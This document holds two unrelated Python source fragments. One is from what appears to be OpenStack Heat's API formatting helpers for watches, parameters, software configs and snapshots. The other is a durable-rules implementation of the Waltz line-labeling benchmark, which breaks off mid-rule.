rpc_api.EVENT_RES_ACTION: event.action,
rpc_api.EVENT_RES_STATUS: event.status,
rpc_api.EVENT_RES_STATUS_DATA: event.reason,
rpc_api.EVENT_RES_TYPE: event.resource_type,
rpc_api.EVENT_RES_PROPERTIES: event.resource_properties,
}
return result
def format_notification_body(stack):
# some other possibilities here are:
# - template name
# - template size
# - resource count
if stack.status is not None and stack.action is not None:
state = '_'.join(stack.state)
else:
state = 'Unknown'
result = {
rpc_api.NOTIFY_TENANT_ID: stack.context.tenant_id,
rpc_api.NOTIFY_USER_ID: stack.context.user,
rpc_api.NOTIFY_STACK_ID: stack.id,
rpc_api.NOTIFY_STACK_NAME: stack.name,
rpc_api.NOTIFY_STATE: state,
rpc_api.NOTIFY_STATE_REASON: stack.status_reason,
rpc_api.NOTIFY_CREATE_AT: stack.created_time.isoformat(),
}
return result
def format_watch(watch):
updated_at = watch.updated_at or timeutils.utcnow()
result = {
rpc_api.WATCH_ACTIONS_ENABLED: watch.rule.get(
rpc_api.RULE_ACTIONS_ENABLED),
rpc_api.WATCH_ALARM_ACTIONS: watch.rule.get(
rpc_api.RULE_ALARM_ACTIONS),
rpc_api.WATCH_TOPIC: watch.rule.get(rpc_api.RULE_TOPIC),
rpc_api.WATCH_UPDATED_TIME: updated_at.isoformat(),
rpc_api.WATCH_DESCRIPTION: watch.rule.get(rpc_api.RULE_DESCRIPTION),
rpc_api.WATCH_NAME: watch.name,
rpc_api.WATCH_COMPARISON: watch.rule.get(rpc_api.RULE_COMPARISON),
rpc_api.WATCH_DIMENSIONS: watch.rule.get(
rpc_api.RULE_DIMENSIONS) or [],
rpc_api.WATCH_PERIODS: watch.rule.get(rpc_api.RULE_PERIODS),
rpc_api.WATCH_INSUFFICIENT_ACTIONS:
watch.rule.get(rpc_api.RULE_INSUFFICIENT_ACTIONS),
rpc_api.WATCH_METRIC_NAME: watch.rule.get(rpc_api.RULE_METRIC_NAME),
rpc_api.WATCH_NAMESPACE: watch.rule.get(rpc_api.RULE_NAMESPACE),
rpc_api.WATCH_OK_ACTIONS: watch.rule.get(rpc_api.RULE_OK_ACTIONS),
rpc_api.WATCH_PERIOD: watch.rule.get(rpc_api.RULE_PERIOD),
rpc_api.WATCH_STATE_REASON: watch.rule.get(rpc_api.RULE_STATE_REASON),
rpc_api.WATCH_STATE_REASON_DATA:
watch.rule.get(rpc_api.RULE_STATE_REASON_DATA),
rpc_api.WATCH_STATE_UPDATED_TIME: watch.rule.get(
rpc_api.RULE_STATE_UPDATED_TIME, timeutils.utcnow()).isoformat(),
rpc_api.WATCH_STATE_VALUE: watch.state,
rpc_api.WATCH_STATISTIC: watch.rule.get(rpc_api.RULE_STATISTIC),
rpc_api.WATCH_THRESHOLD: watch.rule.get(rpc_api.RULE_THRESHOLD),
rpc_api.WATCH_UNIT: watch.rule.get(rpc_api.RULE_UNIT),
rpc_api.WATCH_STACK_ID: watch.stack_id
}
return result
def format_watch_data(wd):
# Demangle DB format data into something more easily used in the API
# We are expecting a dict with exactly two items, Namespace and
# a metric key
namespace = wd.data['Namespace']
metric = [(k, v) for k, v in wd.data.items() if k != 'Namespace']
if len(metric) == 1:
metric_name, metric_data = metric[0]
else:
LOG.error(_LE("Unexpected number of keys in watch_data.data!"))
return
result = {
rpc_api.WATCH_DATA_ALARM: wd.watch_rule.name,
rpc_api.WATCH_DATA_METRIC: metric_name,
rpc_api.WATCH_DATA_TIME: wd.created_at.isoformat(),
rpc_api.WATCH_DATA_NAMESPACE: namespace,
rpc_api.WATCH_DATA: metric_data
}
return result
def format_validate_parameter(param):
"""Format a template parameter for validate template API call.
Formats a template parameter and its schema information from the engine's
internal representation (i.e. a Parameter object and its associated
Schema object) to a representation expected by the current API (for example
to be compatible to CFN syntax).
"""
# map of Schema object types to API expected types
schema_to_api_types = {
param.schema.STRING: rpc_api.PARAM_TYPE_STRING,
param.schema.NUMBER: rpc_api.PARAM_TYPE_NUMBER,
param.schema.LIST: rpc_api.PARAM_TYPE_COMMA_DELIMITED_LIST,
param.schema.MAP: rpc_api.PARAM_TYPE_JSON,
param.schema.BOOLEAN: rpc_api.PARAM_TYPE_BOOLEAN
}
res = {
rpc_api.PARAM_TYPE: schema_to_api_types.get(param.schema.type,
param.schema.type),
rpc_api.PARAM_DESCRIPTION: param.description(),
rpc_api.PARAM_NO_ECHO: 'true' if param.hidden() else 'false',
rpc_api.PARAM_LABEL: param.label()
}
if param.has_default():
res[rpc_api.PARAM_DEFAULT] = param.default()
if param.user_value:
res[rpc_api.PARAM_VALUE] = param.user_value
constraint_description = []
# build constraints
for c in param.schema.constraints:
if isinstance(c, constr.Length):
if c.min is not None:
res[rpc_api.PARAM_MIN_LENGTH] = c.min
if c.max is not None:
res[rpc_api.PARAM_MAX_LENGTH] = c.max
elif isinstance(c, constr.Range):
if c.min is not None:
res[rpc_api.PARAM_MIN_VALUE] = c.min
if c.max is not None:
res[rpc_api.PARAM_MAX_VALUE] = c.max
elif isinstance(c, constr.AllowedValues):
res[rpc_api.PARAM_ALLOWED_VALUES] = list(c.allowed)
elif isinstance(c, constr.AllowedPattern):
res[rpc_api.PARAM_ALLOWED_PATTERN] = c.pattern
elif isinstance(c, constr.CustomConstraint):
res[rpc_api.PARAM_CUSTOM_CONSTRAINT] = c.name
if c.description:
constraint_description.append(c.description)
if constraint_description:
res[rpc_api.PARAM_CONSTRAINT_DESCRIPTION] = " ".join(
constraint_description)
return res
def format_software_config(sc, detail=True):
if sc is None:
return
result = {
rpc_api.SOFTWARE_CONFIG_ID: sc.id,
rpc_api.SOFTWARE_CONFIG_NAME: sc.name,
rpc_api.SOFTWARE_CONFIG_GROUP: sc.group,
rpc_api.SOFTWARE_CONFIG_CREATION_TIME: sc.created_at.isoformat()
}
if detail:
result[rpc_api.SOFTWARE_CONFIG_CONFIG] = sc.config['config']
result[rpc_api.SOFTWARE_CONFIG_INPUTS] = sc.config['inputs']
result[rpc_api.SOFTWARE_CONFIG_OUTPUTS] = sc.config['outputs']
result[rpc_api.SOFTWARE_CONFIG_OPTIONS] = sc.config['options']
return result
def format_software_deployment(sd):
if sd is None:
return
result = {
rpc_api.SOFTWARE_DEPLOYMENT_ID: sd.id,
rpc_api.SOFTWARE_DEPLOYMENT_SERVER_ID: sd.server_id,
rpc_api.SOFTWARE_DEPLOYMENT_INPUT_VALUES: sd.input_values,
rpc_api.SOFTWARE_DEPLOYMENT_OUTPUT_VALUES: sd.output_values,
rpc_api.SOFTWARE_DEPLOYMENT_ACTION: sd.action,
rpc_api.SOFTWARE_DEPLOYMENT_STATUS: sd.status,
rpc_api.SOFTWARE_DEPLOYMENT_STATUS_REASON: sd.status_reason,
rpc_api.SOFTWARE_DEPLOYMENT_CONFIG_ID: sd.config.id,
rpc_api.SOFTWARE_DEPLOYMENT_CREATION_TIME: sd.created_at.isoformat(),
}
if sd.updated_at:
result[rpc_api.SOFTWARE_DEPLOYMENT_UPDATED_TIME] = (
sd.updated_at.isoformat())
return result
def format_snapshot(snapshot):
if snapshot is None:
return
result = {
rpc_api.SNAPSHOT_ID: snapshot.id,
rpc_api.SNAPSHOT_NAME: snapshot.name,
rpc_api.SNAPSHOT_STATUS: snapshot.status,
rpc_api.SNAPSHOT_STATUS_REASON: snapshot.status_reason,
rpc_api.SNAPSHOT_DATA: snapshot.data,
rpc_api.SNAPSHOT_CREATION_TIME: snapshot.created_at.isoformat(),
}
return result
| |
from durable.lang import *
import math
import datetime
import json
_fact_count = 0
def create_and_post(host, fact):
global _fact_count
fact['id'] = _fact_count
fact['sid'] = 1
host.post('waltzdb', fact)
_fact_count += 1
def create_and_assert(host, fact):
global _fact_count
fact['id'] = _fact_count
fact['sid'] = 1
host.assert_fact('waltzdb', fact)
_fact_count += 1
def get_x(val):
return math.floor(val / 100)
def get_y(val):
return val % 100
def get_angle(p1, p2):
delta_x = get_x(p2) - get_x(p1)
delta_y = get_y(p2) - get_y(p1)
if delta_x == 0:
if delta_y > 0:
return math.pi / 2
elif delta_y < 0:
return -math.pi / 2
elif delta_y == 0:
if delta_x > 0:
return 0
elif delta_x < 0:
return math.pi
else:
return math.atan2(delta_y, delta_x)
def get_inscribable_angle(base_point, p1, p2):
angle1 = get_angle(base_point, p1)
angle2 = get_angle(base_point, p2)
temp = math.fabs(angle1 - angle2)
if temp > math.pi:
return math.fabs(2 * math.pi - temp)
return temp
def make_3j_junction(j, base_point, p1, p2, p3):
angle12 = get_inscribable_angle(base_point, p1, p2)
angle13 = get_inscribable_angle(base_point, p1, p3)
angle23 = get_inscribable_angle(base_point, p2, p3)
sum1213 = angle12 + angle13
sum1223 = angle12 + angle23
sum1323 = angle13 + angle23
total = 0
if sum1213 < sum1223:
if sum1213 < sum1323:
total = sum1213
j['p2'] = p1; j['p1'] = p2; j['p3'] = p3
else:
total = sum1323
j['p2'] = p3; j['p1'] = p1; j['p3'] = p2
else:
if sum1223 < sum1323:
total = sum1223
j['p2'] = p2; j['p1'] = p1; j['p3'] = p3
else:
total = sum1323
j['p2'] = p3; j['p1'] = p1; j['p3'] = p2
if math.fabs(total - math.pi) < 0.001:
j['name'] = 'tee'
elif total > math.pi:
j['name'] = 'fork'
else:
j['name'] = 'arrow'
def unix_time(dt):
epoch = datetime.datetime.utcfromtimestamp(0)
delta = dt - epoch
return delta.total_seconds()
def unix_time_millis(dt):
return unix_time(dt) * 1000.0
with ruleset('waltzdb'):
@when_all(cap(1000),
c.line << m.t == 'line',
c.stage << (m.t == 'stage') & (m.l == 'duplicate'))
def reverse_edges(c):
for frame in c.m:
print('Edge {0} {1}'.format(frame.line.p1, frame.line.p2))
print('Edge {0} {1}'.format(frame.line.p2, frame.line.p1))
c.post({'id': c.s.gid, 't': 'edge', 'p1': frame.line.p1, 'p2': frame.line.p2, 'joined': False})
c.post({'id': c.s.gid + 1, 't': 'edge', 'p1': frame.line.p2, 'p2': frame.line.p1, 'joined': False})
c.s.gid += 2
@when_all(pri(1),
c.stage << (m.t == 'stage') & (m.l == 'duplicate'))
def done_reversing(c):
c.retract_fact(c.stage)
c.assert_fact({'id': c.s.gid, 't': 'stage', 'l': 'detect_junctions'})
c.s.gid += 1
print('detect_junctions')
@when_all(cap(1000),
c.e1 << (m.t == 'edge') & (m.joined == False),
c.e2 << (m.t == 'edge') & (m.joined == False) & (m.p1 == c.e1.p1) & (m.p2 != c.e1.p2),
c.e3 << (m.t == 'edge') & (m.joined == False) & (m.p1 == c.e1.p1) & (m.p2 != c.e1.p2) & (m.p2 != c.e2.p2),
c.stage << (m.t == 'stage') & (m.l == 'detect_junctions'))
def make_3_junction(c):
for frame in c.m:
j = {'id': c.s.gid, 't': 'junction', 'base_point': frame.e1.p1, 'j_t': '3j', 'visited': 'no'}
make_3j_junction(j, frame.e1.p1, frame.e1.p2, frame.e2.p2, frame.e3.p2)
print('Junction {0} {1} {2} {3} {4}'.format(j['name'], j['base_point'], j['p1'], j['p2'], j['p3']))
c.assert_fact(j)
frame.e1.id = c.s.gid + 1; frame.e1.joined = True; frame.e1.j_t = '3j'; c.assert_fact(frame.e1)
frame.e2.id = c.s.gid + 2; frame.e2.joined = True; frame.e2.j_t = '3j'; c.assert_fact(frame.e2)
frame.e3.id = c.s.gid + 3; frame.e3.joined = True; frame.e3.j_t = '3j'; c.assert_fact(frame.e3)
c.s.gid += 4
@when_all(cap(1000),
c.e1 << (m.t == 'edge') & (m.joined == False),
c.e2 << (m.t == 'edge') & (m.joined == False) & (m.p1 == c.e1.p1) & (m.p2 != c.e1.p2),
none((m.t == 'edge') & (m.p1 == c.e1.p1) & (m.p2 != c.e1.p2) & (m.p2 != c.e2.p2)),
c.stage << (m.t == 'stage') & (m.l == 'detect_junctions'))
def make_l(c):
for frame in c.m:
j = {'id': c.s.gid, 't': 'junction', 'base_point': frame.e1.p1, 'j_t': '2j', 'visited': 'no', 'name': 'L', 'p1': frame.e1.p2, 'p2': frame.e2.p2}
print('Junction L {0} {1} {2}'.format(frame.e1.p1, frame.e1.p2, frame.e2.p2))
c.assert_fact(j)
frame.e1.id = c.s.gid + 1; frame.e1.joined = True; frame.e1.j_t = '2j'; c.assert_fact(frame.e1)
frame.e2.id = c.s.gid + 2; frame.e2.joined = True; frame.e2.j_t = '2j'; c.assert_fact(frame.e2)
c.s.gid += 3
@when_all(pri(1),
c.stage << (m.t == 'stage') & (m.l == 'detect_junctions'))
def done_detecting(c):
c.retract_fact(c.stage)
c.post({'id': c.s.gid, 't': 'stage', 'l': 'find_initial_boundary'})
c.s.gid += 1
print('find_initial_boundary')
@when_all(c.j << (m.t == 'junction') & (m.j_t == '2j') & (m.visited == 'no'),
c.e1 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p1),
c.e2 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p2),
none((m.t == 'junction') & (m.j_t == '2j') & (m.visited == 'no') & (m.base_point > c.j.base_point)),
(m.t == 'stage') & (m.l == 'find_initial_boundary'))
def initial_boundary_junction_l(c):
#c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'yes'; c.assert_fact(c.j)
c.assert_fact({'id': c.s.gid + 1, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p1, 'label_name': 'B', 'lid': '1'})
c.assert_fact({'id': c.s.gid + 2, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p2, 'label_name': 'B', 'lid': '1'})
c.post({'id': c.s.gid + 3, 't': 'stage', 'l': 'find_second_boundary'})
c.s.gid += 4
print('find_second_boundary')
@when_all(c.j << (m.t == 'junction') & (m.j_t == '3j') & (m.name == 'arrow') & (m.visited == 'no'),
c.e1 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p1),
c.e2 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p2),
c.e3 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p3),
none((m.t == 'junction') & (m.visited == 'no') & (m.base_point > c.j.base_point)),
(m.t == 'stage') & (m.l == 'find_initial_boundary'))
def initial_boundary_junction_arrow(c):
#c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'yes'; c.assert_fact(c.j)
c.assert_fact({'id': c.s.gid + 1, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p1, 'label_name': 'B', 'lid': '14'})
c.assert_fact({'id': c.s.gid + 2, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p2, 'label_name': '+', 'lid': '14'})
c.assert_fact({'id': c.s.gid + 3, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p3, 'label_name': 'B', 'lid': '14'})
c.post({'id': c.s.gid + 4, 't': 'stage', 'l': 'find_second_boundary'})
c.s.gid += 5
print('find_second_boundary')
@when_all(c.j << (m.t == 'junction') & (m.j_t == '2j') & (m.visited == 'no'),
c.e1 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p1),
c.e2 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p2),
none((m.t == 'junction') & (m.visited != 'no') & (m.base_point < c.j.base_point)),
(m.t == 'stage') & (m.l == 'find_second_boundary'))
def second_boundary_junction_l(c):
c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'yes'; c.assert_fact(c.j)
c.assert_fact({'id': c.s.gid + 1, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p1, 'label_name': 'B', 'lid': '1'})
c.assert_fact({'id': c.s.gid + 2, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p2, 'label_name': 'B', 'lid': '1'})
c.post({'id': c.s.gid + 3, 't': 'stage', 'l': 'labeling'})
c.s.gid += 4
print('labeling')
@when_all(c.j << (m.t == 'junction') & (m.j_t == '3j') & (m.name == 'arrow') & (m.visited == 'no'),
c.e1 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p1),
c.e2 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p2),
c.e3 << (m.t == 'edge') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p3),
none((m.t == 'junction') & (m.visited != 'no') & (m.base_point < c.j.base_point)),
(m.t == 'stage') & (m.l == 'find_second_boundary'))
def second_boundary_junction_arrow(c):
c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'yes'; c.assert_fact(c.j)
c.assert_fact({'id': c.s.gid + 1, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p1, 'label_name': 'B', 'lid': '14'})
c.assert_fact({'id': c.s.gid + 2, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p2, 'label_name': '+', 'lid': '14'})
c.assert_fact({'id': c.s.gid + 3, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p3, 'label_name': 'B', 'lid': '14'})
c.post({'id': c.s.gid + 4, 't': 'stage', 'l': 'labeling'})
c.s.gid += 5
print('labeling')
@when_all(c.j << (m.t == 'junction') & (m.j_t == '3j') & (m.visited == 'no'),
(m.t == 'stage') & (m.l == 'labeling'))
def start_visit_3_junction(c):
c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'now'; c.assert_fact(c.j)
c.assert_fact({'id': c.s.gid + 1, 't': 'stage', 'l': 'visiting_3j'})
c.s.gid += 2
print('visiting_3j')
@when_all(c.j << (m.t == 'junction') & (m.j_t == '2j') & (m.visited == 'no'),
(m.t == 'stage') & (m.l == 'labeling'))
def start_visit_2_junction(c):
c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'now'; c.assert_fact(c.j)
c.assert_fact({'id': c.s.gid + 1, 't': 'stage', 'l': 'visiting_2j'})
c.s.gid += 2
print('visiting_2j')
@when_all(pri(1),
(m.t == 'stage') & (m.l == 'labeling'))
def done_labeling(c):
print('end {0}'.format(unix_time_millis(datetime.datetime.now()) - c.s.start_time))
def visit_3j(c):
print('Edge Label {0} {1} {2} {3}'.format(c.j.base_point, c.j.p1, c.l.n1, c.l.lid))
print('Edge Label {0} {1} {2} {3}'.format(c.j.base_point, c.j.p2, c.l.n2, c.l.lid))
print('Edge Label {0} {1} {2} {3}'.format(c.j.base_point, c.j.p3, c.l.n3, c.l.lid))
c.assert_fact({'id': c.s.gid, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p1, 'label_name': c.l.n1, 'lid': c.l.lid})
c.assert_fact({'id': c.s.gid + 1, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p2, 'label_name': c.l.n2, 'lid': c.l.lid})
c.assert_fact({'id': c.s.gid + 2, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p3, 'label_name': c.l.n3, 'lid': c.l.lid})
c.s.gid += 3
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n1),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n2),
c.el3 << (m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n3),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_0(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
none((m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point)),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n2),
c.el3 << (m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n3),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_1(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n1),
none((m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point)),
c.el3 << (m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n3),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_2(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
none((m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point)),
c.el3 << (m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n3),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_3(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n1),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n2),
none((m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_4(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
none((m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point)),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n2),
none((m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_5(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n1),
none((m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_6(c):
visit_3j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
none((m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.p3) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_3j'))
def visit_3j_7(c):
visit_3j(c)
@when_all(pri(1),
(m.t == 'junction') & (m.visited == 'now') & (m.j_t == '3j'),
c.stage << (m.t == 'stage') & (m.l == 'visiting_3j'))
def end_visit_3j(c):
c.retract_fact(c.stage)
c.assert_fact({'id': c.s.gid, 't': 'stage', 'l': 'marking'})
c.s.gid += 1
print('marking')
def visit_2j(c):
print('Edge Label {0} {1} {2} {3}'.format(c.j.base_point, c.j.p1, c.l.n1, c.l.lid))
print('Edge Label {0} {1} {2} {3}'.format(c.j.base_point, c.j.p2, c.l.n2, c.l.lid))
c.assert_fact({'id': c.s.gid, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p1, 'label_name': c.l.n1, 'lid': c.l.lid})
c.assert_fact({'id': c.s.gid + 1, 't': 'edge_label', 'p1': c.j.base_point, 'p2': c.j.p2, 'label_name': c.l.n2, 'lid': c.l.lid})
c.s.gid += 2
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '2j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n1),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n2),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_2j'))
def visit_2j_0(c):
visit_2j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '2j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
none((m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point)),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n2),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_2j'))
def visit_2j_1(c):
visit_2j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '2j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n1),
none((m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_2j'))
def visit_2j_2(c):
visit_2j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '2j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
none((m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_2j'))
def visit_2j_3(c):
visit_2j(c)
@when_all(pri(1),
(m.t == 'junction') & (m.visited == 'now') & (m.j_t == '2j'),
c.stage << (m.t == 'stage') & (m.l == 'visiting_2j'))
def end_visit_2j(c):
c.retract_fact(c.stage)
c.assert_fact({'id': c.s.gid, 't': 'stage', 'l': 'marking'})
c.s.gid += 1
print('marking')
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now'),
c.e << (m.t == 'edge') & (m.p2 == c.j.base_point),
c.junction << (m.t == 'junction') & (m.base_point == c.e.p1) & (m.visited == 'yes'),
(m.t == 'stage') & (m.l == 'marking'))
def marking(c):
c.retract_fact(c.junction); c.junction.id = c.s.gid; c.junction.visited = 'check'; c.assert_fact(c.junction)
c.s.gid += 1
@when_all(pri(1),
c.j << (m.t == 'junction') & (m.visited == 'now'),
(m.t == 'stage') & (m.l == 'marking'))
def stop_marking(c):
c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'yes'; c.assert_fact(c.j)
c.s.gid += 1
@when_all(pri(2),
c.stage << (m.t == 'stage') & (m.l == 'marking'))
def start_checking(c):
c.retract_fact(c.stage)
c.assert_fact({'id': c.s.gid, 't': 'stage', 'l': 'checking'})
c.s.gid += 1
print('checking')
@when_all(c.junction << (m.t == 'junction') & (m.visited == 'check'),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.junction.base_point),
c.j << (m.t == 'junction') & (m.base_point == c.el1.p2) & (m.visited == 'yes'),
none((m.t == 'edge_label') & (m.p1 == c.el1.p2) & (m.p2 == c.junction.base_point) & (m.label_name == c.el1.label_name)),
c.stage << (m.t == 'stage') & (m.l == 'checking'))
def checking(c):
print('remove_label')
c.retract_fact(c.stage)
c.assert_fact({'id': c.s.gid, 't': 'illegal', 'base_point': c.junction.base_point, 'lid': c.el1.lid})
c.post({'id': c.s.gid + 1, 't': 'stage', 'l': 'remove_label'})
c.s.gid += 2
@when_all(pri(1),
c.j << (m.t == 'junction') & (m.visited == 'check'),
(m.t == 'stage') & (m.l == 'checking'))
def checking2(c):
c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'yes'; c.assert_fact(c.j)
c.s.gid += 1
@when_all(pri(2),
c.stage << (m.t == 'stage') & (m.l == 'checking'))
def stop_checking(c):
c.retract_fact(c.stage)
c.post({'id': c.s.gid, 't': 'stage', 'l': 'labeling'})
c.s.gid += 1
print('labeling')
@when_all(c.i << (m.t == 'illegal'),
c.j << (m.t == 'junction') & (m.j_t == '3j') & (m.base_point == c.i.base_point),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p1) & (m.lid == c.i.lid),
